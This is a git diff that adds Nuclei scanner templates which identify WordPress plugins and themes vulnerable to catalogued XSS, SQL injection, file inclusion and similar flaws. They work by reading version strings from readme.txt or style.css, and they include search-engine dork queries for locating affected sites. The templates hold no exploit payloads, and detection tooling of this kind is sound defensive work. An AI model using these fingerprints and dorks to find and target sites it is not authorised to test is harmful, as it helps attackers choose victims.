+ - "{{BaseURL}}/wp-content/plugins/mybooktable/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mybooktable"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3.9')
\ No newline at end of file
diff --git a/poc/other/orbisius-child-theme-creator-1388a1cf61f535dcb681bbd612e698ac.yaml b/poc/other/orbisius-child-theme-creator-1388a1cf61f535dcb681bbd612e698ac.yaml
new file mode 100644
index 0000000000..5c44484ba3
--- /dev/null
+++ b/poc/other/orbisius-child-theme-creator-1388a1cf61f535dcb681bbd612e698ac.yaml
@@ -0,0 +1,59 @@
+id: orbisius-child-theme-creator-1388a1cf61f535dcb681bbd612e698ac
+
+info:
+ name: >
+ Child Theme Creator <= 1.5.4 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f25f358b-f9b7-4660-8dda-673023dc1967?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/orbisius-child-theme-creator/"
+ google-query: inurl:"/wp-content/plugins/orbisius-child-theme-creator/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,orbisius-child-theme-creator,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/orbisius-child-theme-creator/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "orbisius-child-theme-creator"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.4')
\ No newline at end of file
diff --git a/poc/other/page-builder-add-44aa89903f2ffee1de9ece8f6a3890e8.yaml b/poc/other/page-builder-add-44aa89903f2ffee1de9ece8f6a3890e8.yaml
new file mode 100644
index 0000000000..c7066d2a8a
--- /dev/null
+++ b/poc/other/page-builder-add-44aa89903f2ffee1de9ece8f6a3890e8.yaml
@@ -0,0 +1,59 @@
+id: page-builder-add-44aa89903f2ffee1de9ece8f6a3890e8
+
+info:
+ name: >
+ Landing Page Builder <= 1.5.2.0 - Authenticated (Editor+) Local File Inlcusion
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/bacfa993-2fc1-43bc-b4f0-f463ba28b4ed?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/page-builder-add/"
+ google-query: inurl:"/wp-content/plugins/page-builder-add/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,page-builder-add,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/page-builder-add/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "page-builder-add"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.2.0')
\ No newline at end of file
diff --git a/poc/other/piotnet-addons-for-elementor-81ce2f8f926f79a35ddf670ee48af4b5.yaml b/poc/other/piotnet-addons-for-elementor-81ce2f8f926f79a35ddf670ee48af4b5.yaml
new file mode 100644
index 0000000000..67e49ea1bc
--- /dev/null
+++ b/poc/other/piotnet-addons-for-elementor-81ce2f8f926f79a35ddf670ee48af4b5.yaml
@@ -0,0 +1,59 @@
+id: piotnet-addons-for-elementor-81ce2f8f926f79a35ddf670ee48af4b5
+
+info:
+ name: >
+ Piotnet Addons For Elementor <= 2.4.30 - Authenticated (Contributor+) Stored Cross-Site Scripting via Multiple Widgets
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/921616e4-2b66-4847-869a-90c1c459685f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/piotnet-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/piotnet-addons-for-elementor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,piotnet-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/piotnet-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "piotnet-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.30')
\ No newline at end of file
diff --git a/poc/other/propovoice-c028c15a3dc86a47681670ace75ba13e.yaml b/poc/other/propovoice-c028c15a3dc86a47681670ace75ba13e.yaml
new file mode 100644
index 0000000000..be6960971c
--- /dev/null
+++ b/poc/other/propovoice-c028c15a3dc86a47681670ace75ba13e.yaml
@@ -0,0 +1,59 @@
+id: propovoice-c028c15a3dc86a47681670ace75ba13e
+
+info:
+ name: >
+ Propovoice CRM <= 1.7.6.4 - Unauthenticated Insecure Direct Object Reference
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/25acd3d9-0c1a-426e-b670-b842f031bdc5?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/propovoice/"
+ google-query: inurl:"/wp-content/plugins/propovoice/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,propovoice,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/propovoice/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "propovoice"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7.6.4')
\ No newline at end of file
diff --git a/poc/other/purity-of-soul-eb9462c64668d462d768e2cde373e11a.yaml b/poc/other/purity-of-soul-eb9462c64668d462d768e2cde373e11a.yaml
new file mode 100644
index 0000000000..8076bac3cd
--- /dev/null
+++ b/poc/other/purity-of-soul-eb9462c64668d462d768e2cde373e11a.yaml
@@ -0,0 +1,59 @@
+id: purity-of-soul-eb9462c64668d462d768e2cde373e11a
+
+info:
+ name: >
+ Purity Of Soul <= 1.9 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/53d2f416-4b0f-49b7-af14-fbb225aac34d?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/purity-of-soul/"
+ google-query: inurl:"/wp-content/themes/purity-of-soul/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,purity-of-soul,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/purity-of-soul/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "purity-of-soul"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.9')
\ No newline at end of file
diff --git a/poc/other/responsive-block-editor-addons-cb81193d1b4184fab4fc973bfc5493ba.yaml b/poc/other/responsive-block-editor-addons-cb81193d1b4184fab4fc973bfc5493ba.yaml
new file mode 100644
index 0000000000..7947626f93
--- /dev/null
+++ b/poc/other/responsive-block-editor-addons-cb81193d1b4184fab4fc973bfc5493ba.yaml
@@ -0,0 +1,59 @@
+id: responsive-block-editor-addons-cb81193d1b4184fab4fc973bfc5493ba
+
+info:
+ name: >
+ Responsive Blocks – WordPress Gutenberg Blocks <= 1.8.8 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1c894de0-2ea7-4002-9c26-0e3e59744a5e?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/responsive-block-editor-addons/"
+ google-query: inurl:"/wp-content/plugins/responsive-block-editor-addons/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,responsive-block-editor-addons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/responsive-block-editor-addons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "responsive-block-editor-addons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.8.8')
\ No newline at end of file
diff --git a/poc/other/salon-booking-system-6c91068c03b4d3c474e474c51a7a4b0b.yaml b/poc/other/salon-booking-system-6c91068c03b4d3c474e474c51a7a4b0b.yaml
new file mode 100644
index 0000000000..c0be494ace
--- /dev/null
+++ b/poc/other/salon-booking-system-6c91068c03b4d3c474e474c51a7a4b0b.yaml
@@ -0,0 +1,59 @@
+id: salon-booking-system-6c91068c03b4d3c474e474c51a7a4b0b
+
+info:
+ name: >
+ Salon booking system <= 10.8.1 - Unauthenticated Open Redirect
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b8e64950-4f01-4391-8c65-2f25ff5bcc06?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/salon-booking-system/"
+ google-query: inurl:"/wp-content/plugins/salon-booking-system/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,salon-booking-system,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/salon-booking-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "salon-booking-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 10.8.1')
\ No newline at end of file
diff --git a/poc/other/store-locator-le-1945eefef5d2527af79b680ff46e0cd5.yaml b/poc/other/store-locator-le-1945eefef5d2527af79b680ff46e0cd5.yaml
new file mode 100644
index 0000000000..62f597abb5
--- /dev/null
+++ b/poc/other/store-locator-le-1945eefef5d2527af79b680ff46e0cd5.yaml
@@ -0,0 +1,59 @@
+id: store-locator-le-1945eefef5d2527af79b680ff46e0cd5
+
+info:
+ name: >
+ Store Locator Plus <= 2311.17.01 - Unauthenticated Sensitive Information Exposure
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3a3597fa-71e2-4753-b226-5d95e576947a?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/store-locator-le/"
+ google-query: inurl:"/wp-content/plugins/store-locator-le/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,store-locator-le,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/store-locator-le/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "store-locator-le"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2311.17.01')
\ No newline at end of file
diff --git a/poc/other/structured-content-c817ba2ce17903cc737df2e15e7a24ee.yaml b/poc/other/structured-content-c817ba2ce17903cc737df2e15e7a24ee.yaml
new file mode 100644
index 0000000000..76a1c07b89
--- /dev/null
+++ b/poc/other/structured-content-c817ba2ce17903cc737df2e15e7a24ee.yaml
@@ -0,0 +1,59 @@
+id: structured-content-c817ba2ce17903cc737df2e15e7a24ee
+
+info:
+ name: >
+ Structured Content <= 1.6.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/908e4755-e439-4714-b0cb-3fc546c5ac63?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/structured-content/"
+ google-query: inurl:"/wp-content/plugins/structured-content/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,structured-content,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/structured-content/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "structured-content"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.2')
\ No newline at end of file
diff --git a/poc/other/team-9f214d2d0b43c932c0c20f490727942d.yaml b/poc/other/team-9f214d2d0b43c932c0c20f490727942d.yaml
new file mode 100644
index 0000000000..8bc20c5ec4
--- /dev/null
+++ b/poc/other/team-9f214d2d0b43c932c0c20f490727942d.yaml
@@ -0,0 +1,59 @@
+id: team-9f214d2d0b43c932c0c20f490727942d
+
+info:
+ name: >
+ Team Showcase <= 1.22.23 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f702fef0-8f07-4c94-bbf7-394d66f9ddde?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/team/"
+ google-query: inurl:"/wp-content/plugins/team/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,team,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/team/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "team"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.22.23')
\ No newline at end of file
diff --git a/poc/other/tutor-73b95a02c60b2d8fc29e4d380e9a408f.yaml b/poc/other/tutor-73b95a02c60b2d8fc29e4d380e9a408f.yaml
new file mode 100644
index 0000000000..198a9a9d57
--- /dev/null
+++ b/poc/other/tutor-73b95a02c60b2d8fc29e4d380e9a408f.yaml
@@ -0,0 +1,59 @@
+id: tutor-73b95a02c60b2d8fc29e4d380e9a408f
+
+info:
+ name: >
+ Tutor LMS <= 2.7.2 - Authenticated (Administrator+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/839b68e6-0462-4f88-ac13-ed4b69887d6b?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/tutor/"
+ google-query: inurl:"/wp-content/plugins/tutor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,tutor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/tutor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "tutor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7.2')
\ No newline at end of file
diff --git a/poc/other/ultimate-store-kit-34c1e94782b55b611d35e47ac7b7afcb.yaml b/poc/other/ultimate-store-kit-34c1e94782b55b611d35e47ac7b7afcb.yaml
new file mode 100644
index 0000000000..5c685bf65b
--- /dev/null
+++ b/poc/other/ultimate-store-kit-34c1e94782b55b611d35e47ac7b7afcb.yaml
@@ -0,0 +1,59 @@
+id: ultimate-store-kit-34c1e94782b55b611d35e47ac7b7afcb
+
+info:
+ name: >
+ Ultimate Store Kit Elementor Addons <= 1.6.4 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/51a4886b-2e15-4d91-b853-4a675120a9e9?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/ultimate-store-kit/"
+ google-query: inurl:"/wp-content/plugins/ultimate-store-kit/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,ultimate-store-kit,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ultimate-store-kit/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ultimate-store-kit"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.4')
\ No newline at end of file
diff --git a/poc/other/visual-composer-starter-6909271bdc06f95eea673edff022023b.yaml b/poc/other/visual-composer-starter-6909271bdc06f95eea673edff022023b.yaml
new file mode 100644
index 0000000000..5dc0c218c2
--- /dev/null
+++ b/poc/other/visual-composer-starter-6909271bdc06f95eea673edff022023b.yaml
@@ -0,0 +1,59 @@
+id: visual-composer-starter-6909271bdc06f95eea673edff022023b
+
+info:
+ name: >
+ Visual Composer Starter <= 3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/72c0fc66-44c7-4657-878a-e5109178e8e3?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/visual-composer-starter/"
+ google-query: inurl:"/wp-content/themes/visual-composer-starter/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,visual-composer-starter,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/visual-composer-starter/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "visual-composer-starter"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3')
\ No newline at end of file
diff --git a/poc/other/wemail-5fb8bcbdd6e11191313c75649788eb26.yaml b/poc/other/wemail-5fb8bcbdd6e11191313c75649788eb26.yaml
new file mode 100644
index 0000000000..bb7565ddec
--- /dev/null
+++ b/poc/other/wemail-5fb8bcbdd6e11191313c75649788eb26.yaml
@@ -0,0 +1,59 @@
+id: wemail-5fb8bcbdd6e11191313c75649788eb26
+
+info:
+ name: >
+ weMail <= 1.14.5 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/82e9bd78-726f-421f-8bf0-560fa9eeab2c?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wemail/"
+ google-query: inurl:"/wp-content/plugins/wemail/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wemail,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wemail/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wemail"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.14.5')
\ No newline at end of file
diff --git a/poc/other/whmpress-0d5977b07c81b352711972147990171c.yaml b/poc/other/whmpress-0d5977b07c81b352711972147990171c.yaml
new file mode 100644
index 0000000000..038c903fa0
--- /dev/null
+++ b/poc/other/whmpress-0d5977b07c81b352711972147990171c.yaml
@@ -0,0 +1,59 @@
+id: whmpress-0d5977b07c81b352711972147990171c
+
+info:
+ name: >
+ WHMpress <= 6.2-revision-5 - Missing Authorization to Authenticated (Subscriber+) Settings Update
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7d264e88-7137-48ff-8ce3-5fff77e2474a?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/whmpress/"
+ google-query: inurl:"/wp-content/plugins/whmpress/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,whmpress,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/whmpress/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "whmpress"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.2-revision-5')
\ No newline at end of file
diff --git a/poc/other/whmpress-a7309bcc642848ac99c10a4311b79606.yaml b/poc/other/whmpress-a7309bcc642848ac99c10a4311b79606.yaml
new file mode 100644
index 0000000000..668bfc084d
--- /dev/null
+++ b/poc/other/whmpress-a7309bcc642848ac99c10a4311b79606.yaml
@@ -0,0 +1,59 @@
+id: whmpress-a7309bcc642848ac99c10a4311b79606
+
+info:
+ name: >
+ WHMpress <= 6.2-revision-5 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5dea4293-0496-4cee-9d8a-c15beaa51b14?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/whmpress/"
+ google-query: inurl:"/wp-content/plugins/whmpress/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,whmpress,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/whmpress/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "whmpress"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.2-revision-5')
\ No newline at end of file
diff --git a/poc/other/woo-products-widgets-for-elementor-0a67d2084052f8465a297fc9f6da1cd3.yaml b/poc/other/woo-products-widgets-for-elementor-0a67d2084052f8465a297fc9f6da1cd3.yaml
new file mode 100644
index 0000000000..9378c5dce7
--- /dev/null
+++ b/poc/other/woo-products-widgets-for-elementor-0a67d2084052f8465a297fc9f6da1cd3.yaml
@@ -0,0 +1,59 @@
+id: woo-products-widgets-for-elementor-0a67d2084052f8465a297fc9f6da1cd3
+
+info:
+ name: >
+ Woo Products Widgets For Elementor <= 2.0.0 - Authenticated (Contributor+) Local File Inclusion
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e8336c89-44ac-4e41-bc81-7dae9599c050?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/woo-products-widgets-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/woo-products-widgets-for-elementor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,woo-products-widgets-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woo-products-widgets-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woo-products-widgets-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.0')
\ No newline at end of file
